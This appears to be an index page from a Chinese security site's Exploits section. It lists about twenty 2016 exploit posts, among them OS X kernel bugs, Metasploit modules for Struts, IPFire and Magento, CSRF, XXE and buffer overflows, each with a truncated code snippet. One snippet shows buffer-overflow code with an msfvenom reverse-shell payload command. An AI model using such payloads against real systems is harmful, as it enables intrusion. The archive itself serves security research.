安全文章 / 文章资料 / Exploits

首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

热门关键字：　shell 　88888 　art 　vitter 　linux

		当前位置：主页>安全文章>文章资料>Exploits>列表


	OS X Kernel - Exploitable NULL Pointer Dereference in IOAudioEngine
	日期：2016-06-12 14:40:25 点击：36 评论：0
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=776 IOAudioEngineUserClient::closeClient sets the audioEngine member pointer to NULL IOReturn IOAudioEngineUserClient::closeClient() { audioDebugIOLog(3, + IOAudioEngineUserClient[%


	OS X Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchec
	日期：2016-06-12 14:39:47 点击：45 评论：0
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=777 Pretty much all the external methods of CoreCaptureUserClient call CoreCaptureUserClient::stashGet passing an attacker controlled key. If that key isn't in the list of stashed o


	OS X Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off
	日期：2016-06-12 14:38:55 点击：26 评论：0
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=778 IOAccelerator external method IOAccelSharedUserClient2::page_off_resource uses the pointer at this+0x100 without checking if it's NULL. A series of dereferences from this pointe


	OS X Kernel - Exploitable NULL Pointer Dereference in AppleGraphicsDeviceControl
	日期：2016-06-12 14:37:23 点击：43 评论：0
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=782 AppleGraphicsDeviceControlClient doesn't check that its pointer to its IOService (at this+0xd8) is non-null before using it in all external methods. We can set this pointer to N


	OS X Kernel - Exploitable NULL Pointer Dereference in AppleMuxControl.kext
	日期：2016-06-12 14:36:47 点击：42 评论：0
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=783 The method AppleGraphicsControlClient::checkArguments does actually appear to test whether the pointer at this+0xd8 is non-null, but uses it anyway :) We can race external metho


	Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
	日期：2016-06-12 14:35:52 点击：43 评论：0
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remo


	IPFire Bash Environment Variable Injection (Shellshock)
	日期：2016-06-12 14:35:12 点击：25 评论：0
## ## This module requires Metasploit: http://metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def in


	IPFire proxy.cgi RCE
	日期：2016-06-12 14:34:29 点击：82 评论：0
## ## This module requires Metasploit: http://metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def in


	Armadito Antimalware - Backdoor/Bypass
	日期：2016-06-12 14:31:59 点击：47 评论：0
/* # Exploit Title : Armadito antimalware - Backdoor/Bypass # Date : 07-06-2016 (DD-MM-YYYY) # Exploit Author : Ax. # Vendor Homepage : http://www.teclib-edition.com/teclib-products/armadito-antivirus/ # Software Link : https://github.com/41434944/ar


	Mobiketa 1.0 - CSRF Add Admin Exploit
	日期：2016-06-12 14:31:18 点击：22 评论：0
!-- # Exploit Title: Mobiketa - CSRF Add Admin Exploit # Date: 09/06/2016 # Exploit Author: Murat YILMAZLAR # Vendor Homepage: http://www.ynetinteractive.com/mobiketa/ # Version: 1.0 # Exploit: -- bug code started -- -- html body form action=[SITE]/[


	Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit
	日期：2016-06-12 14:29:36 点击：95 评论：0
#!/usr/bin/ruby # # Exploit Title: Dell OpenManage Server Administrator 8.3 XXE # Date: June 9, 2016 # Exploit Author: hantwister # Vendor Homepage: http://en.community.dell.com/techcenter/systems-management/w/wiki/1760.openmanage-server-administrato


	Poison Ivy 2.1.x C2 Buffer Overflow (msf)
	日期：2016-06-12 14:28:24 点击：55 评论：0
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote:


	Apache Continuum 1.4.2 Command Injection / Cross Site Scripting
	日期：2016-06-08 13:33:35 点击：47 评论：0
# Exploit Title: Unauthenticated command injection - Apache Continuum# Google Dork: inurl::8080/continuum/# Date: 04/06/2016# Exploit Author: David Shanahan (@cyberpunksec)# Contact: http://www.procheckup.com/# Vendor Homepage: https://continuum.apa


	Magento 2.0.6 Unserialize Remote Code Execution
	日期：2016-06-06 17:16:50 点击：69 评论：0
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::


	Microsoft Windows Forced Firewall Bypass
	日期：2016-06-06 17:15:23 点击：49 评论：0
/* A Proof of Concept how bypass windows firewall Tested at windows 7 Author: Antonio Costa aka Cooler_, CoolerVoid coolerlair@gmail.com Greetz: M0nad, I4K, Slyfunky, Sigsegv, RaphaelSC, MMxM, F-117, Clandestine, LoganBr, Welias, Luanzeiro, Alan JUm


	Boxoft Wav To MP3 Converter 1.0 Buffer Overflow
	日期：2016-06-02 16:38:19 点击：29 评论：0
# Exploit Title: Boxoft WAV to MP3 Converter - SEH Based Buffer Overflow Exploit# Date: 31/5/2016# Exploit Author: Mandar# Vendor Homepage: http://www.boxoft.com/wav-to-mp3/# Software Link: http://www.boxoft.com/wav-to-mp3/setup(free-wav-to-mp3).exe


	Konica Minolta FTP Utility 1.0 SEH Buffer Overflow
	日期：2016-06-01 13:43:59 点击：30 评论：0
import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) junk = x41 * 1037 #offset to EIP #msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.41.55 LPORT=4444 -e x86/shikata_ga_nai -b x00x0dx0ax3dx5cx2f -i


	HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution
	日期：2016-06-01 13:42:56 点击：50 评论：0
# Exploit Title: Data Protector Encrypted Communications # Date: 26-05-2016 # Exploit Author: Ian Lovering # Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/ # Version: A.09.00 and earlier # Tested


	TCPDump 4.5.1 - Crash PoC
	日期：2016-06-01 13:37:42 点击：33 评论：0
# Exploit Title: tcpdump 4.5.1 Access Violation Crash # Date: 31st May 2016 # Exploit Author: David Silveiro # Vendor Homepage: http://www.tcpdump.org # Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz # Version: 4.5.1 # Tested on:


	CCextractor 0.80 - Crash PoC
	日期：2016-06-01 13:37:01 点击：15 评论：0
# Exploit Title: CCextractor 0.80 Access Violation Crash # Date: 31st May 2016 # Exploit Author: David Silveiro (Xino.co.uk) # Vendor Homepage: http://www.ccextractor.org/ # Software Link: http://www.ccextractor.org/download-ccextractor.html # Versio

共637页/12733条记录首页上一页 [116] [117] [118] 119 [120] [121] [122] 下一页末页

本月热点文章

本月推荐文章

相关分类

Exploits

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved